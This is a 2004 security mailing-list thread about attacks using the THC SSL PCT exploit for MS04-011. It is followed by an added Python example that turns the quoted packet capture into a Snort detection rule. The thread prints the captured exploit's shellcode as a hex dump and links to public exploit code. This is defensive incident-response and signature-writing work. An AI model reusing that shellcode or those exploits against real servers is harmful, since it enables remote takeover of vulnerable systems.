Re: Heads up: Looks like MS04-011 exploit is being tried against www.domain

From: Clint Bodungen (clint_at_secureconsulting.com)
Date: 04/28/04

    To: <incidents@securityfocus.com>
    Date: Wed, 28 Apr 2004 10:13:44 -0500
    
    

    Just FYI: I've been able to successfully predict many of these incidents by
    regularly monitoring several lists and sites that new exploits get posted to,
    such as the full-disclosure mailing list. It never fails... a new exploit
    is posted on these lists and anywhere from hours to a few days later
    we get a flood of related incidents. I have scripts that monitor about 50
    different locations for these exploits and the results are at
    http://rootexploit.net/. They update every hour and we usually discuss
    them in the forum and send out advance notices throughout all the members.
    We're talking about using this advance notice to either start writing
    advance Snort signatures for these exploits that are released in preparation
    for possible attack waves (or at least prompt a few interested members to).

    ----- Original Message -----
    From: <falcon@secureconsulting.net>
    To: "James Riden o" <j.riden@massey.ac.nz>
    Cc: <incidents@securityfocus.com>
    Sent: Tuesday, April 27, 2004 9:54 AM
    Subject: Re: Heads up: Looks like MS04-011 exploit is being tried against www.domain

    > This appears to be from the THC exploit for SSL PCT released last week.
    > http://packetstormsecurity.nl/filedesc/THCIISSLame.c.html
    > Running strings against the binary and grep'ing for "THCOWNZIIS!"
    > indicated the match.
    >
    > Also be aware that what appears to be PERL-based exploit code is now
    > readily available, too, for this vulnerability.
    > http://www.k-otik.com/exploits/04242004.iis5x_ssl_pct.pm.php
    >
    > Our experience testing the original THC code indicated that vulnerable
    > systems could be compromised in a matter of seconds.
    >
    > >
    > > Seen as long ago as 25/04/2004. Haven't seen it used against any other
    > > servers here, so it's obviously targeted in some way. Example packet
    > > capture:
    > >
    > > 000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
    > > 010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
    > > 020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
    > > 030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
    > > 040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
    > > 050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
    > > 060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
    > > 070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
    > > 080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
    > > 090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
    > > 0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
    > > 0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
    > > 0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
    > > 0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
    > > 0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
    > > 0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
    > > 100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
    > > 110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
    > > 120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
    > > 130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
    > > 140 : F0 6A FF FF 55 E4 .j..U.
    > >
    > > --
    > > James Riden / j.riden@massey.ac.nz / Systems Security Engineer
    > > GPG public key available at: http://www.massey.ac.nz/~jriden/
    > > This post does not necessarily represent the views of my employer.
    > >
    > >
    >
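The thread identifies the traffic by the "THCOWNZIIS!" tag that `strings`/`grep` turned up in the THC binary, and Clint proposes turning such early sightings into Snort signatures. The following is an added example (not code from the thread or from any of its authors): it rebuilds the payload from James Riden's quoted hex dump exactly as it appears in the mail, checks it for the marker strings visible in the dump, and emits a Snort content rule pinned to the marker's offset. The rule's destination port 443, its `sid`, and the second marker (`WS2_32.DLL`, read off the ASCII column) are my assumptions, not anything the thread states.

```python
import re

# Constructed input: the packet capture quoted in the thread, kept with its
# "> > " reply prefixes so the parser copes with dumps pasted into mail.
CAPTURE = r"""
> > 000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
> > 010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
> > 020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
> > 030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
> > 040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
> > 050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
> > 060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
> > 070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
> > 080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
> > 090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
> > 0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
> > 0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
> > 0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
> > 0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
> > 0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
> > 0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
> > 100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
> > 110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
> > 120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
> > 130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
> > 140 : F0 6A FF FF 55 E4 .j..U.
"""

# "offset : hex bytes ascii", allowing any number of leading "> " quote marks.
HEX_LINE = re.compile(r"^(?:>\s*)*([0-9A-Fa-f]{3})\s*:\s*(.*)$")
HEX_CHARS = set("0123456789abcdefABCDEF")

def parse_hexdump(text: str) -> bytes:
    """Rebuild payload bytes from a (possibly quoted) 16-bytes-per-line hex dump."""
    out = bytearray()
    for raw in text.splitlines():
        m = HEX_LINE.match(raw.strip())
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"dump not contiguous at {offset:#x}, have {len(out)} bytes")
        for tok in m.group(2).split():
            # Stop at the ASCII column (first token that is not a hex pair) or after 16 bytes.
            if len(tok) != 2 or not set(tok) <= HEX_CHARS or len(out) - offset >= 16:
                break
            out.append(int(tok, 16))
    return bytes(out)

# Marker strings. "THCOWNZIIS!" is the tag the thread matched with strings/grep;
# "WS2_32.DLL" is an assumption taken from the dump's ASCII column.
MARKERS = {
    "THCOWNZIIS!": b"THCOWNZIIS!",
    "WS2_32.DLL": b"WS2_32.DLL",
}

def find_markers(payload: bytes, markers=MARKERS) -> dict:
    """Return {marker_name: byte_offset} for each marker found in the payload."""
    hits = {}
    for name, needle in markers.items():
        idx = payload.find(needle)
        if idx != -1:
            hits[name] = idx
    return hits

def snort_rule_for(marker: str, offset: int, sid: int = 1000001, port: int = 443) -> str:
    """Build a Snort rule pinned to the marker at a fixed offset.

    offset/depth restrict the content match to exactly that position, which
    keeps the rule from firing on the tag appearing elsewhere in a stream.
    Port and sid are placeholders (assumed), not values from the thread.
    """
    return (
        f'alert tcp $EXTERNAL_NET any -> $HOME_NET {port} '
        f'(msg:"SSL PCT exploit marker {marker}"; flow:to_server,established; '
        f'content:"{marker}"; offset:{offset}; depth:{len(marker)}; '
        f'classtype:attempted-admin; sid:{sid}; rev:1;)'
    )

if __name__ == "__main__":
    payload = parse_hexdump(CAPTURE)
    print(f"{len(payload)} bytes, first two: {payload[:2].hex()}")
    for name, off in find_markers(payload).items():
        print(f"{name} at offset {off} ({off:#x})")
    print(snort_rule_for("THCOWNZIIS!", find_markers(payload)["THCOWNZIIS!"]))
```

Running it reports the marker at byte 19 (0x13, right after the `EB 0F` at offsets 0x11-0x12 in the dump) and prints a rule that matches only when the tag sits at that position. The same `parse_hexdump`/`find_markers` pair works on any dump pasted to the list, which is the step Clint's advance-notice idea would need before a signature can be drafted.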
    
